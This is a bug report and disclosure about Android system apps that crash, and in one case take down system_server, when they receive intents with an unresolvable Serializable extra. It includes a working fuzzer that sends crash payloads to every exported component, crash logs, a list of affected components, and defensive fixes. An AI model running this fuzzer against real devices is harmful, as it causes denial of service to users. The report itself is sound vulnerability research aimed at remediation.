
Wipe it diligently and often; let no dust settle.


bugreport: a generic bug in which Android intents carrying a Serializable extra crash and restart a large number of system apps


0x0 Description

Fuzzing the latest Android 9.0.0 with the IntentFuzzer tool turned up the same bug in a large number of system apps: most of them can be crashed outright, and in the worst case it takes down the system process itself (the android:ui crash in 0x51, after which zygote restarts the entire framework).
The problem probably exists in most versions on a large number of devices. So far I have only tested a Pixel (sailfish) on 7.1.0 (NDE63H, Oct 2016), 8.1.0 (OPM4.171019.021.P1, Jul 2018), 9.0.0 (PPR2.181005.003.A1, Nov 2018) and the master-branch build aosp_sailfish-userdebug Q PI eng.amd.20181105.110826 test-keys; all of them are affected.

0x1 Tested build

Device: Pixel (sailfish)
Build: Android 9.0.0 (PPR2.181005.003.A1, Nov 2018)
This is the latest factory image currently published at https://developers.google.com/android/images#sailfish.

0x2 POC

The PoC is built on the open-source IntentFuzzer tool. The core attack code is below: it sends every exposed (exported) component an intent carrying a Serializable extra under the key "test". A smaller number of components also crash when sent an empty intent:
fuzzAllSeBtn.setOnClickListener(new OnClickListener() {
    @Override
    public void onClick(View v) {
        // components: every exported activity/service/receiver found on the device
        for (ComponentName cmpName : components) {
            Intent intent = new Intent();
            intent.setComponent(cmpName);
            // SerializableTest exists only in the fuzzer APK, so the target
            // cannot resolve the class while unparcelling the extras
            intent.putExtra("test", new SerializableTest());
            if (sendIntentByType(intent, currentType)) {
                Toast.makeText(FuzzerActivity.this, "Sent Serializeable " + intent, Toast.LENGTH_LONG).show();
            } else {
                Toast.makeText(FuzzerActivity.this, R.string.send_faild, Toast.LENGTH_LONG).show();
            }
        }
    }
});
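The snippet above relies on `components`, `currentType` and `sendIntentByType()` from the IntentFuzzer project, which are not shown on this page. The following is an added, self-contained reconstruction of that flow (my code, not IntentFuzzer's or the post's): it enumerates every exported activity, service and broadcast receiver with PackageManager and delivers both payload variants from the results table in 0x52, an empty intent and one carrying a Serializable extra, through the API that matches the component type. The package name, class names and the `marker` field are assumptions.

```java
package com.example.intentfuzz;   // assumed package name, not IntentFuzzer's

import android.content.ActivityNotFoundException;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.pm.ActivityInfo;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.content.pm.ServiceInfo;
import android.util.Log;

import java.io.Serializable;
import java.util.ArrayList;
import java.util.List;

public final class ExportedComponentFuzzer {
    private static final String TAG = "ExportedComponentFuzzer";

    /** Stand-in for IntentFuzzer's SerializableTest: the class exists only in this
     *  APK, so no receiving process can resolve it while unparcelling the extras. */
    public static final class SerializableTest implements Serializable {
        private static final long serialVersionUID = 1L;
        private final int marker = 0x41414141;   // assumed field; any content will do
    }

    public enum Kind { ACTIVITY, SERVICE, RECEIVER }

    public static final class Target {
        public final ComponentName name;
        public final Kind kind;
        Target(ComponentName name, Kind kind) { this.name = name; this.kind = kind; }
    }

    /** Every exported activity, service and broadcast receiver installed on the device. */
    public static List<Target> collectExported(Context ctx) {
        PackageManager pm = ctx.getPackageManager();
        int flags = PackageManager.GET_ACTIVITIES | PackageManager.GET_SERVICES | PackageManager.GET_RECEIVERS;
        List<Target> out = new ArrayList<>();
        for (PackageInfo pi : pm.getInstalledPackages(flags)) {
            if (pi.activities != null) for (ActivityInfo ai : pi.activities)
                if (ai.exported) out.add(new Target(new ComponentName(ai.packageName, ai.name), Kind.ACTIVITY));
            if (pi.services != null) for (ServiceInfo si : pi.services)
                if (si.exported) out.add(new Target(new ComponentName(si.packageName, si.name), Kind.SERVICE));
            if (pi.receivers != null) for (ActivityInfo ri : pi.receivers)   // receivers are described by ActivityInfo too
                if (ri.exported) out.add(new Target(new ComponentName(ri.packageName, ri.name), Kind.RECEIVER));
        }
        return out;
    }

    /** The two payloads from the results table: "Null" (empty intent) and "Serializable". */
    public static Intent build(ComponentName cn, boolean withSerializable) {
        Intent intent = new Intent().setComponent(cn);
        if (withSerializable) intent.putExtra("test", new SerializableTest());
        return intent;
    }

    /** Deliver through the API that matches the component kind. Returns false when the
     *  sender itself is refused (permission-protected component, disabled component,
     *  background-start limits); a refused send is not a crash and must not be counted as one. */
    public static boolean send(Context ctx, Target t, Intent intent) {
        try {
            switch (t.kind) {
                case ACTIVITY:
                    intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);   // required from a non-Activity Context
                    ctx.startActivity(intent);
                    return true;
                case SERVICE:
                    return ctx.startService(intent) != null;
                case RECEIVER:
                    ctx.sendBroadcast(intent);
                    return true;
            }
        } catch (SecurityException | IllegalStateException | ActivityNotFoundException e) {
            Log.w(TAG, "refused " + t.name.flattenToShortString() + ": " + e.getMessage());
        }
        return false;
    }

    /** Equivalent of the fuzzAllSeBtn handler above, run for both payload variants. */
    public static void fuzzAll(Context ctx) {
        for (Target t : collectExported(ctx)) {
            send(ctx, t, build(t.name, false));
            send(ctx, t, build(t.name, true));
        }
    }
}
```

Run fuzzAll() from a button handler or a worker thread and keep `adb logcat -s *:E` open on the host so each crash can be matched to the component that was just sent. On Android 11 and later, getInstalledPackages() only returns packages visible to the caller, so the fuzzer needs the QUERY_ALL_PACKAGES permission to see the full list, and background-start restrictions will reject many startActivity/startService calls; the helper reports those as refused rather than as crashes.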

0x3 Root cause

When an app receives an intent carrying a Serializable extra and its code reads any extra at all, the serialized object is instantiated even if the code never uses the Serializable read path (readSerializable / getSerializableExtra); an ordinary read like the one below is enough:
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    ButterKnife.bind(this);

    // reads an int under a key the sender never set; this alone unparcels
    // every extra in the Bundle, including the hostile Serializable
    getIntent().getIntExtra("1234", 1);
}
The framework source involved is as follows. When the app touches the extras, Parcel.java parses them; readValue() reads each value's type tag with readInt():
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/os/Parcel.java
    /**
     * Read a typed object from a parcel.  The given class loader will be
     * used to load any enclosed Parcelables.  If it is null, the default class
     * loader will be used.
     */
    public final Object readValue(ClassLoader loader) {
        int type = readInt();
        switch (type) {
        case VAL_NULL:
            return null;
        case VAL_STRING:
            return readString();
        ...
        case VAL_BYTE:
            return readByte();
        // if readInt() returns VAL_SERIALIZABLE, readSerializable(loader) is called to rebuild the object carried in the intent extra
        case VAL_SERIALIZABLE:
            return readSerializable(loader);
        case VAL_PARCELABLEARRAY:
            return readParcelableArray(loader);
        ...
Execution then reaches BaseDexClassLoader.findClass, which cannot find the class and throws; the exception propagates and the app dies, and some processes, such as the android:ui system process, restart after the crash.
The reason a component that never asks for the Serializable is still affected is that a Bundle is unparcelled lazily but all at once: the first getXxx() call runs BaseBundle.unparcel(), which walks every key/value pair through readArrayMapInternal() and readValue(), so every extra in the Bundle is deserialised regardless of which key was requested (see the unparcel -> readArrayMapInternal -> readValue -> readSerializable frames in the trace below). The same detail explains why the system process is not protected: the Bundle "defusing" enabled in system_server only swallows BadParcelableException, while Parcel.readSerializable rethrows a ClassNotFoundException as a plain RuntimeException (the message quoted in 0x51). In short, sending a target app a Serializable whose class it does not contain is enough to crash it; this is a generic problem.
Stack trace of the first exception when the test app crashes:
Caused by: java.lang.ClassNotFoundException: Didn't find class "com.weiqing.fuzzer.util.Utils$2" on path: DexPathList[[zip file "/data/app/com.weiqing.test-2/base.apk"],nativeLibraryDirectories=[/data/app/com.weiqing.test-2/lib/arm64, /data/app/com.weiqing.test-2/base.apk!/lib/arm64-v8a, /system/lib64, /vendor/lib64]]
    at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56) 
    at java.lang.ClassLoader.loadClass(ClassLoader.java:380)
    at java.lang.ClassLoader.loadClass(ClassLoader.java:312)
    at java.lang.Class.classForName(Native Method)
    at java.lang.Class.forName(Class.java:400)
    at android.os.Parcel$2.resolveClass(Parcel.java:2616)
    at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1613)
    at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1518)
    at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1772)
    at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351)
    at java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
    at android.os.Parcel.readSerializable(Parcel.java:2624)
    at android.os.Parcel.readValue(Parcel.java:2416)
    at android.os.Parcel.readArrayMapInternal(Parcel.java:2732)
    at android.os.BaseBundle.unparcel(BaseBundle.java:271)
    at android.os.BaseBundle.getInt(BaseBundle.java:876)
    at android.content.Intent.getIntExtra(Intent.java:6194)
    at com.weiqing.test.MainActivity.onCreate(MainActivity.java:47)
    at android.app.Activity.performCreate(Activity.java:6684)
    at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1119)
    at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2637)
    at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2751)
    at android.app.ActivityThread.-wrap12(ActivityThread.java)
    at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1496)
    at android.os.Handler.dispatchMessage(Handler.java:102)
    at android.os.Looper.loop(Looper.java:154)
    at android.app.ActivityThread.main(ActivityThread.java:6186)
    at java.lang.reflect.Method.invoke(Native Method)
    at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:889)
    at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:779)

0x4 Remediation

0x41 App layer

Every app can avoid the crash by wrapping the read in exception handling (BaseDexClassLoader still throws; the exception is just no longer fatal):
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    ButterKnife.bind(this);

    try {
        getIntent().getIntExtra("1234", 1);
    } catch (Exception e) {
        // Parcel.readSerializable wraps the ClassNotFoundException in a RuntimeException
        e.printStackTrace();
    }
}
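Catching Exception around one getter, as above, works but has to be repeated at every call site, and the root-cause section explains why it is needed at all: the first read of any extra unparcels the whole Bundle. The helper below is an added example (my code, not from the post or from AOSP) that puts the exposure in one place for both passages: it forces the unparcel under a catch and hands back an empty Bundle instead, so an exported Activity, Service or BroadcastReceiver can drop hostile extras rather than die. Class and tag names are assumptions; the catch order reflects the fact, visible in the crash message in 0x51, that Parcel.readSerializable rethrows ClassNotFoundException as a plain RuntimeException on the releases tested here.

```java
import android.content.Intent;
import android.os.BadParcelableException;
import android.os.Bundle;
import android.util.Log;

/**
 * Defensive access to the extras of an intent that reached an exported component.
 *
 * Any getXxxExtra() call unparcels the entire extras Bundle, so an extra the
 * component never asked for is still deserialised. Whatever is read first must
 * therefore be guarded; this class makes that first touch explicit.
 */
public final class SafeExtras {
    private static final String TAG = "SafeExtras";   // assumed tag

    private SafeExtras() {}

    /**
     * Forces BaseBundle.unparcel() here, under a catch, instead of letting it
     * happen inside the component's first getter. Returns Bundle.EMPTY when the
     * intent carries no extras and null when the extras cannot be parsed, so the
     * caller can distinguish "nothing sent" from "something hostile sent".
     */
    public static Bundle extrasOrNull(Intent intent) {
        if (intent == null) return Bundle.EMPTY;
        try {
            Bundle b = intent.getExtras();   // a copy, still in parcelled form
            if (b == null) return Bundle.EMPTY;
            b.size();                        // size() calls unparcel(): any failure surfaces here
            return b;
        } catch (BadParcelableException e) {
            // unknown or malformed Parcelable (thrown by readParcelableCreator)
            Log.w(TAG, "dropping malformed Parcelable extras", e);
        } catch (RuntimeException e) {
            // Parcel.readSerializable wraps IOException/ClassNotFoundException in a
            // plain RuntimeException, which system_server's Bundle defusing does not catch
            Log.w(TAG, "dropping undeserialisable Serializable extras", e);
        }
        return null;
    }

    /** Per-getter guard for code that reads one value and does not want the whole Bundle. */
    public static int getInt(Intent intent, String key, int def) {
        try {
            return intent == null ? def : intent.getIntExtra(key, def);
        } catch (RuntimeException e) {
            Log.w(TAG, "bad extras while reading " + key, e);
            return def;
        }
    }

    public static String getString(Intent intent, String key) {
        try {
            return intent == null ? null : intent.getStringExtra(key);
        } catch (RuntimeException e) {
            Log.w(TAG, "bad extras while reading " + key, e);
            return null;
        }
    }
}

/* Usage in an exported Activity; a BroadcastReceiver or Service guards the Intent
 * handed to onReceive() / onStartCommand() in the same way.
 *
 *   Bundle extras = SafeExtras.extrasOrNull(getIntent());
 *   if (extras == null) { finish(); return; }   // hostile extras: refuse to act on the intent
 *   int value = extras.getInt("1234", 1);       // safe: the Bundle is already unparcelled
 */
```

Exporting a component only when another app genuinely needs to reach it (android:exported="false" otherwise) removes this attack surface entirely. For components that must stay exported, avoid getSerializableExtra() on untrusted input altogether; on Android 13 and later the type-checked getSerializableExtra(String, Class) overload at least restricts which class is instantiated.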

0x42 System layer

The real fix should be made at the system layer, but my coding skills are limited and I cannot offer a concrete suggestion.

0x5 Findings

0x51 System process (android:ui) crash and restart

Affected component: android/com.android.internal.app.IntentForwarderActivity
Crash log (logcat filter: logcat -s *:E | grep FATAL -A 10):
11-29 18:48:42.499  4637  4637 E AndroidRuntime: *** FATAL EXCEPTION IN SYSTEM PROCESS: main
11-29 18:48:42.499  4637  4637 E AndroidRuntime: java.lang.RuntimeException: Unable to start activity ComponentInfo{android/com.android.internal.app.IntentForwarderActivity}: java.lang.RuntimeException: Parcelable encountered ClassNotFoundException reading a Serializable object (name = com.android.intentfuzzer.util.SerializableTest)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2913)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:3048)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.app.servertransaction.LaunchActivityItem.execute(LaunchActivityItem.java:78)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.app.servertransaction.TransactionExecutor.executeCallbacks(TransactionExecutor.java:108)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.app.servertransaction.TransactionExecutor.execute(TransactionExecutor.java:68)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1808)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.os.Handler.dispatchMessage(Handler.java:106)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.os.Looper.loop(Looper.java:193)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at com.android.server.SystemServer.run(SystemServer.java:454)
--
11-29 18:48:42.644  6211  6211 E AndroidRuntime: FATAL EXCEPTION: main
11-29 18:48:42.644  6211  6211 E AndroidRuntime: Process: com.android.intentfuzzer, PID: 6211
11-29 18:48:42.644  6211  6211 E AndroidRuntime: DeadSystemException: The system died; earlier logs will point to the root cause
11-29 18:48:42.647   644  1689 E locSvc_FlpAdapter: E/void FlpLocationAdapter::offloadStopFlpSessionRequest(const FlpSessionKey &):1027]: there is no active flp session at all
11-29 18:48:42.647  5934  8248 E AndroidRuntime: FATAL EXCEPTION: IntentService[DropBoxEntryAddedChimeraService]
11-29 18:48:42.647  5934  8248 E AndroidRuntime: Process: com.google.android.gms, PID: 5934
11-29 18:48:42.647  5934  8248 E AndroidRuntime: java.lang.NullPointerException: Attempt to invoke virtual method 'ofi nvu.c()' on a null object reference
11-29 18:48:42.647  5934  8248 E AndroidRuntime:    at com.google.android.gms.stats.service.DropBoxEntryAddedChimeraService.onHandleIntent(:[email protected]@12.8.62 (100408-199405334):487)
11-29 18:48:42.647  5934  8248 E AndroidRuntime:    at dcb.handleMessage(Unknown Source:6)
11-29 18:48:42.647  5934  8248 E AndroidRuntime:    at android.os.Handler.dispatchMessage(Handler.java:106)
11-29 18:48:42.647  5934  8248 E AndroidRuntime:    at android.os.Looper.loop(Looper.java:193)
11-29 18:48:42.647  5934  8248 E AndroidRuntime:    at android.os.HandlerThread.run(HandlerThread.java:65)
11-29 18:48:42.649  5934  8248 E BaseUncaughtHandler: Hit an exception while processing the UncaughtExceptionHandler. Original exception:
11-29 18:48:42.649  5934  8248 E BaseUncaughtHandler: java.lang.NullPointerException: Attempt to invoke virtual method 'ofi nvu.c()' on a null object reference
11-29 18:48:42.649  5934  8248 E BaseUncaughtHandler:   at com.google.android.gms.stats.service.DropBoxEntryAddedChimeraService.onHandleIntent(:[email protected]@12.8.62 (100408-199405334):487)
--
11-29 18:48:42.674  6292  6292 E AndroidRuntime: FATAL EXCEPTION: main
11-29 18:48:42.674  6292  6292 E AndroidRuntime: Process: com.android.vending, PID: 6292
11-29 18:48:42.674  6292  6292 E AndroidRuntime: DeadSystemException: The system died; earlier logs will point to the root cause
11-29 18:48:42.870  4585  4585 E Zygote  : Exit zygote because system server (4637) has terminated
11-29 18:48:42.951   633   633 E Diag_Lib: BluetoothDeathRecipient: Calling HAL close
11-29 18:48:43.131  8277  8285 E CameraService: onDeviceStatusChanged: State transition to the same status 0x1 not allowed
11-29 18:48:43.131  8277  8285 E CameraService: onDeviceStatusChanged: State transition to the same status 0x1 not allowed
11-29 18:48:43.172  8279  8279 E Netd    : Error adding route 0.0.0.0/0 -> (null) dummy0 to table 1003: File exists
11-29 18:48:43.173  8279  8279 E Netd    : Unable to create netlink socket: Protocol not supported
11-29 18:48:43.330   661  5729 E NxpHal  : Ignoring read, HAL close triggered
11-29 18:48:43.667  8274  8274 E Typeface: Error mapping font file /system/fonts/NotoSerifEthiopic-Regular.otf
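Triage, as an added example (my code, not part of the post): run against every exported component, the logcat filter above produces hundreds of FATAL blocks, and the fields that matter are the crashing process, the ComponentInfo that was being launched and the Serializable class the target failed to resolve. The parser below extracts those and flags processes that died only because system_server went down (DeadSystemException), using lines copied from the 0x51 log above as sample input. It is plain Java with no Android dependency, so it can run on the host against a saved logcat.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Groups "adb logcat -s *:E" output into FATAL EXCEPTION records and extracts
 *  the fields needed to map a crash back to the fuzzed component. */
public final class CrashTriage {

    public static final class Crash {
        public String process = "?";   // package name, or system_server for "FATAL EXCEPTION IN SYSTEM PROCESS"
        public String component;       // contents of ComponentInfo{...} when an activity launch failed
        public String missingClass;    // Serializable class the target could not load, if that was the cause
        public boolean systemDied;     // DeadSystemException: collateral of a system restart, not this process's bug

        @Override public String toString() {
            return process
                 + (component != null ? " " + component : "")
                 + (missingClass != null ? " missing=" + missingClass : "")
                 + (systemDied ? " (killed by system_server restart)" : "");
        }
    }

    private static final Pattern FATAL =
            Pattern.compile("E AndroidRuntime: (?:\\*\\*\\* FATAL EXCEPTION IN SYSTEM PROCESS|FATAL EXCEPTION)");
    private static final Pattern PROCESS =
            Pattern.compile("E AndroidRuntime: Process: (\\S+), PID: \\d+");
    private static final Pattern COMPONENT = Pattern.compile("ComponentInfo\\{([^}]+)\\}");
    private static final Pattern MISSING =
            Pattern.compile("ClassNotFoundException reading a Serializable object \\(name = ([^)]+)\\)");

    /** One Crash per FATAL header; following lines fill in its fields until the next header. */
    public static List<Crash> parse(List<String> lines) {
        List<Crash> crashes = new ArrayList<>();
        Crash cur = null;
        for (String line : lines) {
            if (FATAL.matcher(line).find()) {
                cur = new Crash();
                if (line.contains("IN SYSTEM PROCESS")) cur.process = "system_server";
                crashes.add(cur);
                continue;
            }
            if (cur == null) continue;   // noise before the first FATAL header
            Matcher m = PROCESS.matcher(line);
            if (m.find()) cur.process = m.group(1);
            m = COMPONENT.matcher(line);
            if (m.find()) cur.component = m.group(1);
            m = MISSING.matcher(line);
            if (m.find()) cur.missingClass = m.group(1);
            if (line.contains("DeadSystemException")) cur.systemDied = true;
        }
        return crashes;
    }

    public static void main(String[] args) {
        // Sample input: two records copied from the 0x51 log on this page.
        List<String> sample = Arrays.asList(
            "11-29 18:48:42.499  4637  4637 E AndroidRuntime: *** FATAL EXCEPTION IN SYSTEM PROCESS: main",
            "11-29 18:48:42.499  4637  4637 E AndroidRuntime: java.lang.RuntimeException: Unable to start activity ComponentInfo{android/com.android.internal.app.IntentForwarderActivity}: java.lang.RuntimeException: Parcelable encountered ClassNotFoundException reading a Serializable object (name = com.android.intentfuzzer.util.SerializableTest)",
            "11-29 18:48:42.644  6211  6211 E AndroidRuntime: FATAL EXCEPTION: main",
            "11-29 18:48:42.644  6211  6211 E AndroidRuntime: Process: com.android.intentfuzzer, PID: 6211",
            "11-29 18:48:42.644  6211  6211 E AndroidRuntime: DeadSystemException: The system died; earlier logs will point to the root cause");
        for (Crash c : parse(sample)) System.out.println(c);
    }
}
```

Feed it the full filtered logcat (`adb logcat -d -s *:E > crashes.txt`) and count records with a non-null missingClass to get the list of components that fail on the Serializable payload; records flagged systemDied should be discarded, since they are side effects of the system_server restart rather than independent findings.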

0x52 Many apps crash

App (process/package)   Affected component   Intent type that crashes it
Legend: Null = crashes on an empty intent; Serializable = crashes on an intent carrying a Serializable extra; Null/Serializable = both. A row that starts with a bare component belongs to the package of the preceding row.
android android/com.android.internal.app.ConfirmUserCreationActivity Null/Serializable
com.google.android.carriersetup com.google.android.carriersetup/com.google.android.carriersetup.VzwSetupActivity Serializable
com.android.cts.priv.ctsshim com.android.cts.priv.ctsshim/com.android.cts.priv.ctsshim.UpgradeNewAuthority Null/Serializable
com.android.cts.priv.ctsshim/com.android.cts.priv.ctsshim.UpgradeNewScheme Null/Serializable
com.android.cts.priv.ctsshim/com.android.cts.priv.ctsshim.UpgradeNewCategory Null/Serializable
com.android.cts.priv.ctsshim/com.android.cts.priv.ctsshim.InstallPriority Null/Serializable
(almost every activity in this package) Null/Serializable
com.google.android.youtube com.google.android.youtube/com.google.android.apps.youtube.app.application.Shell$SettingsActivity Serializable
com.google.android.googlequicksearchbox com.google.android.googlequicksearchbox/com.google.android.apps.gsa.staticplugins.opa.hq.ResizableOpaHqActivity Serializable
com.google.android.googlequicksearchbox/com.google.android.apps.gsa.velour.DynamicActivityTrampoline Serializable
com.google.android.googlequicksearchbox/com.google.android.apps.gsa.speech.setupwizard.HotwordSetupWizardActivity Serializable
com.google.android.apps.gsa.bloblobber.receiver.BlobDownloadedReceiver Serializable
com.google.android.apps.gsa.search.core.location.LocationReceiver Serializable
android.process.media com.android.providers.media.MediaScannerReceiver Null
MediaScannerService Serializable
com.qti.service.colorservice com.qti.service.colorservice Null/Serializable
com.android.documentsui com.android.documentsui/com.android.documentsui.ScopedAccessActivity Serializable
com.android.htmlviewer com.android.htmlviewer/com.android.htmlviewer.HTMLViewerActivity Serializable
com.google.android.apps.multidevice.client com.google.android.apps.multidevice.client/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.google.android.apps.multidevice.client/com.google.android.apps.multidevice.client.ui.pixel.SetupActivity Serializable
com.google.android.apps.multidevice.client.connection.PixelInitializer Serializable
com.google.android.apps.messaging com.google.android.apps.messaging/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.google.android.apps.messaging/com.google.android.apps.messaging.ui.WidgetPickConversationActivity Serializable
com.google.android.apps.messaging/com.google.firebase.iid.FirebaseInstanceIdService Serializable
com.google.android.apps.messaging.shared.experiments.BuglePhenotypeBroadcastReceiver Serializable
com.google.android.apps.messaging/com.google.firebase.messaging.FirebaseMessagingService Serializable
com.google.android.soundpicker com.google.android.soundpicker/com.google.android.soundpicker.PickerActivity Serializable
com.google.android.configupdater com.google.android.configupdater.CertPin.CertPinUpdateRequestReceiver Serializable
com.google.android.configupdater.NetworkWatchlist.NetworkWatchlistUpdateRequestReceiver Serializable
com.android.vending com.android.vending/com.google.android.wallet.instrumentmanager.redirect.ImFinishAndroidAppRedirectActivity Serializable
com.android.vending/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.android.vending/com.google.android.finsky.family.setup.FamilySetupActivity Serializable
com.google.android.finsky.setup.LauncherConfigurationReceiver Serializable
com.android.vending/com.google.firebase.iid.FirebaseInstanceIdService Serializable
com.android.certinstaller com.android.certinstaller/com.android.certinstaller.CertInstallerMain Serializable
com.google.android.marvin.talkback com.google.android.marvin.talkback/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.android.egg com.android.egg.octo.Ocquarium Serializable
com.android.egg.neko.NekoLand Serializable
com.android.egg.neko.NekoActivationActivity Serializable
com.android.mtp com.android.mtp/com.android.mtp.ReceiverActivity Serializable
com.android.mtp.UsbIntentReceiver Null/Serializable
com.android.nfc com.android.nfc.BeamShareActivity Serializable
com.google.android.deskclock com.google.android.deskclock/com.android.deskclock.DeskClock Serializable
com.android.alarmclock.DigitalAppWidgetProvider Null/Serializable
com.qualcomm.qti.radioconfiginterface RadioConfigService Null/Serializable
com.google.android.as com.google.android.as/com.google.android.apps.miphone.aiai.settings.ui.SettingsActivity Serializable
com.google.android.gm com.google.android.gm/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.google.android.gm/com.google.android.gm.CreateShortcutActivityGmail Serializable
com.google.android.gm/com.google.android.gm.ComposeActivityGmailExternal Serializable
com.android.email.service.EmailBroadcastReceiver Null/Serializable
com.google.android.carrier com.google.android.carrier.CarrierSettingsReceiver Null/Serializable
com.qualcomm.qti.auth.secureextauthservice com.qualcomm.qti.auth.secureextauthservice.SecureExtAuthService Null/Serializable
com.google.android.setupwizard com.google.android.setupwizard/com.google.android.setupwizard.predeferred.PreDeferredSetupWizardActivity Serializable
com.google.android.setupwizard/com.google.android.setupwizard.user.GoogleServicesWrapper Serializable
com.google.android.setupwizard/com.google.android.setupwizard.WizardManagerActivity Null/Serializable
com.google.android.music com.google.android.music/com.google.android.gms.appinvite.PreviewActivity Serializable
com.google.android.music/com.google.android.music.ui.navigation.AppNavigationTrampolineActivity Null/Serializable
com.google.android.music/com.google.android.music.ui.navigation.ShortcutTrampolineActivity Null/Serializable
com.google.android.dialer com.google.android.dialer/com.android.incallui.telecomeventui.InternationalCallOnWifiDialogActivity Serializable
com.google.android.dialer/com.google.android.apps.dialer.main.GoogleMainActivity Serializable
com.android.voicemail.VoicemailSecretCodeReceiver Null
com.google.android.apps.cloudprint com.google.android.apps.cloudprint/android.app.AliasActivity Serializable
com.google.android.apps.cloudprint/com.google.android.apps.cloudprint.printdialog.AdvancedPrintOptionsActivity Null/Serializable
com.android.musicfx com.android.musicfx/com.android.musicfx.Compatibility$Redirector Serializable
com.android.musicfx/com.android.musicfx.ActivityMusic Serializable
com.android.musicfx.ControlPanelReceiver Serializable
com.android.musicfx.Compatibility$Receiver Null
com.google.android.apps.maps com.google.android.apps.maps/com.google.android.gms.appinvite.PreviewActivity Serializable
com.google.android.apps.maps/com.google.android.apps.gmm.car.firstrun.GmmProjectedFirstRunActivity Serializable
com.google.android.apps.maps/com.google.android.libraries.abuse.reporting.ReportAbuseActivity Null
com.google.android.apps.gmm.traffic.notification.service.TrafficToPlaceNotificationGeofenceReceiver Serializable
com.google.android.markup com.google.android.markup/com.google.android.markup.AnnotateActivity Serializable
com.android.cellbroadcastreceiver com.android.cellbroadcastreceiver.CellBroadcastListActivity Serializable
com.android.cellbroadcastreceiver.CellBroadcastSettings Serializable
com.google.android.contacts com.google.android.contacts/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.android.keychain com.android.keychain/com.android.keychain.KeyChainActivity Serializable
com.google.android.calculator com.google.android.calculator2.Calculator Serializable
com.google.android.calculator2.Licenses Serializable
com.android.chrome com.android.chrome/com.android.webview.chromium.LicenseActivity Serializable
com.android.chrome/org.chromium.chrome.browser.browseractions.BrowserActionActivity Serializable
com.qualcomm.qti.rcsbootstraputil com.qualcomm.qti.rcsbootstraputil.RCSReceiver Null/Serializable
com.google.android.packageinstaller com.google.android.packageinstaller/com.android.packageinstaller.InstallStart Serializable
com.google.android.gms com.google.android.gms/com.google.firebase.auth.api.gms.ui.BrowserSignInResponseHandlerActivity Null
com.google.android.gms/com.google.android.gms.matchstick.ui.ConversationListActivity Null
com.google.android.gms/com.google.android.gms.wallet.buyflow.CheckoutActivity Null
com.google.android.gms/com.google.android.gms.smartdevice.magicwand.MagicWandActivity Null
com.google.android.gms/com.google.android.gms.googlehelp.contact.chat.ChatSupportRequestFormActivity Null
com.google.android.gms/com.google.android.gms.auth.api.credentials.ui.CredentialsSaveConfirmationActivity Null
com.google.android.gms/com.google.android.gms.family.v2.invites.SendInvitationsActivity Serializable
com.google.android.gms/com.google.android.gms.trustagent.discovery.OnbodyPromotionActivity Serializable
com.google.android.gms/com.google.android.gms.tapandpay.settings.TapAndPaySettingsActivity Serializable
com.google.android.gms/com.google.android.gms.matchstick.call.CallEntryActivity Serializable
com.google.android.gms/com.google.android.gms.locationsharing.activity.OnboardingActivity Serializable
com.google.android.gms/com.google.android.gms.instantapps.settings.SettingsActivity Serializable
com.google.android.gms/com.google.android.gms.games.PlayGamesUpgradeActivity Serializable
com.google.android.gms/com.google.android.gms.car.FirstActivity Serializable
com.google.android.gms/com.google.android.gms.backup.component.BackupSettingsActivity Serializable
com.google.android.gms.auth.api.credentials.openyolo.provider.CredentialQueryReceiver Serializable
com.google.android.gms.checkin.CheckinServiceTriggerReceiver Serializable
com.google.android.gms.gcm.GcmSenderProxy Serializable
com.google.android.gms.update.SystemUpdateServiceActiveReceiver Serializable
com.google.android.libraries.social.autobackup.PicasaQuotaChangedReceiver Serializable
com.google.android.gms.vision.DependencyBroadcastReceiverProxy Serializable
com.google.android.gms.trustagent.BluetoothDeviceBondStateBroadcastReceiver Serializable
com.google.android.gms.checkin.CheckinService Null/Serializable
com.google.android.gms/.fitness.service.recording.FitRecordingBroker Null/Serializable
com.google.android.gms/.carsetup.wifi.CarWifiConnectionService Serializable
com.google.android.gms/com.google.firebase.messaging.FirebaseMessagingService Serializable
com.google.android.gsf com.google.android.gsf/com.google.android.gsf.settings.ConfirmLgaaylActivity Serializable
com.google.android.gsf/com.google.android.gsf.settings.UseLocationForServicesActivity Serializable
com.google.android.tag com.google.android.tag/com.android.apps.tag.TagViewer Serializable
